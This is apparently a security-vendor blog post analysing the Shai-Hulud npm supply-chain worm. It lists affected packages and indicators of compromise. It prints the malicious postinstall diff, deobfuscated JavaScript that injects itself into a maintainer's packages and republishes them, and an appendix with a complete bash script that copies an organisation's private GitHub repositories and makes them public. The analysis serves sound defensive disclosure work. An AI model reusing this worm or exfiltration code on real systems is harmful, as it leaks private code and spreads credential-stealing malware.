npm Supply Chain Attack Exposes Private Repositories, AWS Credentials and More

TL;DR

npm supply chain attacks continue. This time targeting @ctrl/tinycolor and multiple other npm packages with credential stealer malware. In this blog, we will analyze the attack and its impact on the npm ecosystem. We will also look at common attack patterns that are being used to target maintainers.

Lately we have observed multiple high-profile software supply chain attacks against the npm ecosystem:

These attacks target packages collectively with over 2 BILLION weekly downloads. While the payloads used in these attacks have questionable sophistication levels, the continued success of malicious actors in breaching highly popular open source packages exposes risks in the open source software supply chain, especially for software development teams shipping professional software.

There are, however, common patterns that are observed in these attacks:

2FA phishing attacks against maintainers as we saw in the eslint-config-prettier incident
Maintainers of dormant packages are being targeted as we saw in the ansi-style incident and today’s incident as well.

For example, @ctrl/tinycolor did not have a release since over a year.

Summary of Malicious Payload

Credential Harvesting:

Generates GitHub authentication tokens using gh auth token command
Harvests AWS credentials from environment variables, configuration files, Web Identity Tokens, and EC2 Instance Metadata Service (IMDS)
Uses TruffleHog to scan the local filesystem for secrets and credentials
Exfiltrates all discovered credentials to an attacker-controlled webhook.site URL

Repository Compromise:

Injects malicious GitHub Action workflows into all repositories accessible to the compromised user
Copies private repositories and makes them public with the description Shai-Hulud Migration
Removes .github/workflows directories during the migration process to avoid detection

Self-Propagating Worm Behavior:

Extracts npm authentication tokens from .npmrc files
Identifies npm packages where the compromised user has maintainer access
Downloads package tarballs, injects the malicious bundle.js payload, and adds postinstall scripts
Automatically publishes new malicious versions of packages to npm registry
Increments package version numbers to ensure the malicious versions are treated as updates

How SafeDep can help?

Protect GitHub Repositories

To protect the developer community against malicious packages that are flagged by SafeDep, we built free to use SafeDep GitHub App. It can be installed with zero configuration and will scan every pull request for malicious packages.

Protect Developer Environments

SafeDep open source tools especially vet and pmg can help protect developers from malicious packages and other open source software supply chain attacks.

The Attack

The following is the list of affected package versions as published by Socket Security:

Package	Versions
angulartics2	14.1.2
@ctrl/deluge	7.2.2
@ctrl/golang-template	1.4.3
@ctrl/magnet-link	4.0.4
@ctrl/ngx-codemirror	7.0.2
@ctrl/ngx-csv	6.0.2
@ctrl/ngx-emoji-mart	9.2.2
@ctrl/ngx-rightclick	4.0.2
@ctrl/qbittorrent	9.7.2
@ctrl/react-adsense	2.0.2
@ctrl/shared-torrent	6.3.2
@ctrl/tinycolor	4.1.1, 4.1.2
@ctrl/torrent-file	4.1.2
@ctrl/transmission	7.3.1
@ctrl/ts-base32	4.0.2
encounter-playground	0.0.5
json-rules-engine-simplified	0.2.4, 0.2.1
koa2-swagger-ui	5.11.2, 5.11.1
@nativescript-community/gesturehandler	2.0.35
@nativescript-community/sentry	4.6.43
@nativescript-community/text	1.6.13
@nativescript-community/ui-collectionview	6.0.6
@nativescript-community/ui-drawer	0.1.30
@nativescript-community/ui-image	4.5.6
@nativescript-community/ui-material-bottomsheet	7.2.72
@nativescript-community/ui-material-core	7.2.76
@nativescript-community/ui-material-core-tabs	7.2.76
ngx-color	10.0.2
ngx-toastr	19.0.2
ngx-trend	8.0.1
react-complaint-image	0.0.35
react-jsonschema-form-conditionals	0.3.21
react-jsonschema-form-extras	1.0.4
rxnt-authentication	0.0.6
rxnt-healthchecks-nestjs	1.0.5
rxnt-kue	1.0.7
swc-plugin-component-annotate	1.9.2
ts-gaussian	3.0.6

Technical Analysis

We will use @ctrl/[email protected] as the malicious sample for our analysis. SafeDep’s automated malicious package analysis engine flagged this version based on post-install script and signature match.

Field	Value
Package	`@ctrl/[email protected]`
Status	Malicious
Analyzed at	2025-09-15T20:14:35Z
Source	https://registry.npmjs.org/@ctrl/deluge/-/deluge-7.2.2.tgz
SHA256	`bc18414929992e8e8d2211f9c51ebc7241294a1af3cfdbdd5ca417974b2dac0b`

We compared version 7.2.0 and 7.2.2 to identify the malicious changes. The obvious difference was the size of the package.

1
❯ du -sh *
2
 12K    deluge-7.2.0.tgz
3
2.0M    deluge-7.2.2.tgz

Subsequently, we looked at package.json changes and observed a newly introduced postinstall script in the malicious version.

1
❯ diff -u package-7.2.0/package.json package-7.2.2/package.json
2
--- package-7.2.0/package.json  1985-10-26 13:45:00
3
+++ package-7.2.2/package.json  2025-09-16 01:43:28
4
@@ -1,6 +1,6 @@
5
 {
6
   "name": "@ctrl/deluge",
7
-  "version": "7.2.0",
8
+  "version": "7.2.2",
9
   "description": "TypeScript api wrapper for deluge using got",
10
   "author": "Scott Cooper <[email protected]>",
11
   "license": "MIT",
12
@@ -25,7 +25,8 @@
13
     "build:docs": "typedoc",
14
     "test": "vitest run",
15
     "test:watch": "vitest",
16
-    "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml"
17
+    "test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml",
18
+    "postinstall": "node bundle.js"
19
   },
20
   "dependencies": {
21
     "@ctrl/magnet-link": "^4.0.2",
22
@@ -83,4 +84,4 @@
23
     "importOrderSeparation": true,
24
     "importOrderSortSpecifiers": false
25
   }
26
-}
27
+}

Looking at some of the strings in bundle.js, it appears to be packed with webpack.

1
/*! For license information please see bundle.js.LICENSE.txt */
2
import{createRequire as __WEBPACK_EXTERNAL_createRequire}from"node:module";var __webpack_modules__={1:(t,r,n)=>{n.r(r),n.d(r,{isRedirect:()=>isRedirect});const F=new Set([301,302,303,307
3
,308])

Payload

Observed malicious payload in bundle.js:

Generates a GitHub auth token using gh auth token with the current user’s credentials
Contains an embedded bash script that injects a malicious GitHub Action workflow into all repositories of the authenticated user
Contains an embedded bash script that copies private repositories using the compromised GitHub token and makes them public with the description Shai-Hulud Migration
Uses Trufflehog to mine secrets from the local filesystem and exfiltrate them to an attacker-controlled webhook.site URL
Harvests AWS credentials from environment variables, local configuration files, Web Identity Tokens, and the IMDS endpoint

Self-replicating worm like behavior

The bundle.js payload has self-replicating worm-like behavior to infect npm packages that are accessible to the authenticated user. To achieve this, the payload does the following:

Finds the infected user’s npm token from the .npmrc file
Calls https://registry.npmjs.org/-/whoami to validate the token and retrieve the username
Searches for packages that are accessible to the authenticated user as a maintainer
Downloads the package tarball, injects the bundle.js payload, and adds a postinstall script to package.json
Publishes the package to the authenticated user’s npm registry using the npm publish ... command

Example code:

1
async searchPackages(t, r = 20) {
2
    const n = `/-/v1/search?text=${encodeURIComponent(t)}&size=${r}`,
3
        F = `${this.baseUrl}${n}`;
4
    try {
5
        const t = await fetch(F, {
6
            method: "GET",
7
            headers: this.getHeaders(!1)
8
        });
9
        if (!t.ok) throw new Error(`HTTP ${t.status}: ${t.statusText}`);
10
        return (await t.json()).objects || []
11
    } catch (t) {
12
        return console.error("Error searching packages:", t), []
13
    }
14
}

Update Package to inject bundle.js and modify package.json

1
async updatePackage(t) {
2
  try {
3
      const ie = await fetch(t.tarballUrl, {
4
          method: "GET",
5
          headers: {
6
              "User-Agent": this.userAgent,
7
              Accept: "*/*",
8
              "Accept-Encoding": "gzip, deflate, br"
9
          }
10
      });
11
      // [...]
12
      try {
13
          await re.promises.writeFile(ce, se), await te(`gzip -d -c ${ce} > ${le}`), await te(`tar -xf ${le} -C ${ae} package/package.json`);
14
          const t = ne.join(ae, "package", "package.json"),
15
              r = await re.promises.readFile(t, "utf-8"),
16
              n = JSON.parse(r);
17
          if (n.version) {
18
              const t = n.version.split(".");
19
              if (3 === t.length) {
20
                  const r = parseInt(t[0]),
21
                      F = parseInt(t[1]),
22
                      te = parseInt(t[2]);
23
                  isNaN(te) || (n.version = `${r}.${F}.${te+1}`)
24
              }
25
          }
26
          n.scripts || (n.scripts = {}), n.scripts.postinstall = "node bundle.js", await re.promises.writeFile(t, JSON.stringify(n, null, 2)), await te(`tar -uf ${le} -C ${ae}   package/package.json`);
27
          const F = process.argv[1];
28
          if (F && await re.promises.access(F).then(() => !0).catch(() => !1)) {
29
              const t = ne.join(ae, "package", "bundle.js"),
30
                  r = await re.promises.readFile(F);
31
              await re.promises.writeFile(t, r), await te(`tar -uf ${le} -C ${ae} package/bundle.js`)
32
          }
33
          await te(`gzip -c ${le} > ${ue}`), await te(`npm publish ${ue}`), await re.promises.rm(ae, {
34
              recursive: !0,
35
              force: !0
36
          })
37
      } catch (t) {
38
          // [...]
39
      }
40
  } catch (t) {
41
      throw new Error(`Failed to update package: ${t}`)
42
  }
43
}

Impact

At the time of writing, at least 650+ repositories appear to be affected by this attack, as observed in a GitHub search.

Indicators of Compromise (IOC)

bundle.js SHA2 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
GitHub repositories with description Shai-Hulud Migration example
HTTP requests to hxxps://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7

Appendix

Manually formatted shell script from bundle.js that exfiltrates private repositories using a compromised GitHub token and makes them public with the description Shai-Hulud Migration:

1
#!/bin/bash
2

3
#-----------------------------------------------------------------------
4
# This script is designed to migrate all private and internal GitHub
5
# repositories from a source organization to a target user's account.
6
#
7
# It performs the following actions:
8
#   1. Fetches all non-archived private and internal repositories from the SOURCE_ORG.
9
#   2. For each repository, it creates a new private repository under the TARGET_USER.
10
#   3. It then mirrors the original repository to the new one.
11
#   4. Crucially, it removes the .github/workflows directory during migration.
12
#   5. After a successful migration, it makes the new repository PUBLIC.
13
#
14
# Usage:
15
#   ./migrate_script.sh <SOURCE_ORG> <TARGET_USER> <GITHUB_TOKEN>
16
#
17
# Arguments:
18
#   SOURCE_ORG: The name of the GitHub organization to migrate from.
19
#   TARGET_USER: The GitHub username to migrate the repositories to.
20
#   GITHUB_TOKEN: A personal access token with 'repo' scope.
21
#-----------------------------------------------------------------------
22

23
SOURCE_ORG=""
24
TARGET_USER=""
25
GITHUB_TOKEN=""
26
PER_PAGE=100
27
TEMP_DIR=""
28

29
# --- Argument Validation ---
30
if [[ $# -lt 3 ]]; then
31
    echo "Error: Missing arguments."
32
    echo "Usage: $0 <SOURCE_ORG> <TARGET_USER> <GITHUB_TOKEN>"
33
    exit 1
34
fi
35

36
SOURCE_ORG="$1"
37
TARGET_USER="$2"
38
GITHUB_TOKEN="$3"
39

40
if [[ -z "$SOURCE_ORG" || -z "$TARGET_USER" || -z "$GITHUB_TOKEN" ]]; then
41
    echo "Error: All three arguments are required."
42
    exit 1
43
fi
44

45
# Create a temporary directory for cloning repositories
46
TEMP_DIR="./temp$TARGET_USER"
47
mkdir -p "$TEMP_DIR"
48
TEMP_DIR=$(realpath "$TEMP_DIR")
49

50
# --- Function to make authenticated GitHub API calls ---
51
github_api() {
52
    local endpoint="$1"
53
    local method="${2:-GET}"
54
    local data="${3:-}"
55

56
    local curl_args=("-s" "-w" "%{http_code}" "-H" "Authorization: token $GITHUB_TOKEN" "-H" "Accept: application/vnd.github.v3+json")
57

58
    if [[ "$method" != "GET" ]]; then
59
        curl_args+=("-X" "$method")
60
    fi
61

62
    if [[ -n "$data" ]]; then
63
        curl_args+=("-H" "Content-Type: application/json" "-d" "$data")
64
    fi
65

66
    curl "${curl_args[@]}" "https://api.github.com$endpoint"
67
}
68

69
# --- Function to retrieve all repositories from an organization ---
70
get_all_repos() {
71
    local org="$1"
72
    local page=1
73
    local all_slugs="[]"
74

75
    while true; do
76
        local response
77
        response=$(github_api "/orgs/$org/repos?type=private,internal&per_page=$PER_PAGE&page=$page")
78

79
        local http_code="${response: -3}"
80
        local body="${response%???}"
81

82
        if ! echo "$body" | jq empty 2>/dev/null || ! echo "$body" | jq -e 'type == "array"' >/dev/null; then
83
            return 1
84
        fi
85

86
        local repos_count
87
        repos_count=$(echo "$body" | jq length)
88

89
        if [[ "$repos_count" -eq 0 ]]; then
90
            break
91
        fi
92

93
        local page_slugs
94
        page_slugs=$(echo "$body" | jq '[.[] | select(.archived == false) | .full_name]')
95
        all_slugs=$(echo "$all_slugs" "$page_slugs" | jq -s 'add')
96
        ((page++))
97
    done
98

99
    echo "$all_slugs"
100
}
101

102
# --- Function to create a new repository for the target user ---
103
create_repo() {
104
    local repo_name="$1"
105
    local repo_data
106
    repo_data=$(cat <<EOF
107
{
108
    "name": "$repo_name",
109
    "description": "Shai-Hulud Migration",
110
    "private": true,
111
    "has_issues": false,
112
    "has_projects": false,
113
    "has_wiki": false
114
}
115
EOF
116
    )
117

118
    local response
119
    response=$(github_api "/user/repos" "POST" "$repo_data")
120

121
    local http_code="${response: -3}"
122
    local body="${response%???}"
123

124
    if echo "$body" | jq -e '.name' >/dev/null 2>&1; then
125
        return 0
126
    else
127
        # Handle secondary rate limits by sleeping
128
        if [[ "$http_code" =~ ^4[0-9][0-9]$ ]] && echo "$body" | grep -qi "secondary rate"; then
129
            sleep 600
130
            response=$(github_api "/user/repos" "POST" "$repo_data")
131
            http_code="${response: -3}"
132
            body="${response%???}"
133
            if echo "$body" | jq -e '.name' >/dev/null 2>&1; then
134
                return 0
135
            fi
136
        fi
137
        return 1
138
    fi
139
}
140

141
# --- Function to make a repository public ---
142
make_repo_public() {
143
    local repo_name="$1"
144
    local repo_data
145
    repo_data=$(cat <<EOF
146
{
147
    "private": false
148
}
149
EOF
150
    )
151

152
    local response
153
    response=$(github_api "/repos/$TARGET_USER/$repo_name" "PATCH" "$repo_data")
154
    local http_code="${response: -3}"
155
    local body="${response%???}"
156

157
    if echo "$body" | jq -e '.private == false' >/dev/null 2>&1; then
158
        return 0
159
    else
160
        return 1
161
    fi
162
}
163

164
# --- Function to migrate a repository using git mirror ---
165
migrate_repo() {
166
    local source_clone_url="$1"
167
    local target_clone_url="$2"
168
    local migration_name="$3"
169
    local repo_dir="$TEMP_DIR"
170

171
    if ! git clone --mirror "$source_clone_url" "$repo_dir/$migration_name" 2>/dev/null; then
172
        return 1
173
    fi
174

175
    cd "$repo_dir/$migration_name"
176
    if ! git remote set-url origin "$target_clone_url" 2>/dev/null; then
177
        cd - >/dev/null
178
        return 1
179
    fi
180

181
    # Temporarily convert to a regular repo to remove workflows
182
    git config --unset core.bare
183
    git reset --hard
184

185
    # Remove workflows directory and commit the change
186
    if [[ -d ".github/workflows" ]]; then
187
        rm -rf .github/workflows
188
        git add -A
189
        git commit -m "Remove GitHub workflows directory"
190
    fi
191

192
    # Convert back to a bare repo for mirroring
193
    git config core.bare true
194
    rm -rf *
195

196
    if ! git push --mirror 2>/dev/null; then
197
        cd - >/dev/null
198
        return 1
199
    fi
200

201
    cd - >/dev/null
202
    rm -rf "$repo_dir/$migration_name"
203
    return 0
204
}
205

206
# --- Function to process the list of repositories ---
207
process_repositories() {
208
    local repos="$1"
209
    local total_repos
210
    total_repos=$(echo "$repos" | jq length)
211

212
    if [[ "$total_repos" -eq 0 ]]; then
213
        return 0
214
    fi
215

216
    local success_count=0
217
    local failure_count=0
218

219
    for i in $(seq 0 $((total_repos - 1))); do
220
        local repo
221
        repo=$(echo "$repos" | jq -r ".[$i]")
222
        local migration_name="${repo//\//-}-migration"
223

224
        local auth_source_url="https://$GITHUB_TOKEN@github.com/$repo.git"
225
        local auth_target_url="https://$GITHUB_TOKEN@github.com/$TARGET_USER/$migration_name.git"
226

227
        echo "Migrating $repo to $TARGET_USER/$migration_name..."
228

229
        if create_repo "$migration_name"; then
230
            if migrate_repo "$auth_source_url" "$auth_target_url" "$migration_name"; then
231
                if make_repo_public "$migration_name"; then
232
                    echo "  -> Success: Migrated and made public."
233
                    ((success_count++))
234
                else
235
                    # Still counts as a success if migration worked but public toggle failed
236
                    echo "  -> Warning: Migrated but failed to make public."
237
                    ((success_count++))
238
                fi
239
            else
240
                echo "  -> Error: Migration failed."
241
                ((failure_count++))
242
            fi
243
        else
244
            echo "  -> Error: Could not create target repository."
245
            ((failure_count++))
246
        fi
247
    done
248

249
    echo "-------------------------------------"
250
    echo "Migration Complete."
251
    echo "Successful: $success_count"
252
    echo "Failed:     $failure_count"
253
    echo "-------------------------------------"
254

255
    return $failure_count
256
}
257

258
# --- Main execution block ---
259
main() {
260
    # Check for required command-line tools
261
    for tool in curl jq git; do
262
        if ! command -v "$tool" &> /dev/null; then
263
            echo "Error: Required tool '$tool' is not installed."
264
            exit 1
265
        fi
266
    done
267

268
    echo "Fetching repositories from $SOURCE_ORG..."
269
    local repos
270
    if ! repos=$(get_all_repos "$SOURCE_ORG"); then
271
        echo "Error: Failed to fetch repositories from $SOURCE_ORG."
272
        exit 1
273
    fi
274

275
    process_repositories "$repos"
276
}
277

278
# Run main function with provided arguments
279
main "$@"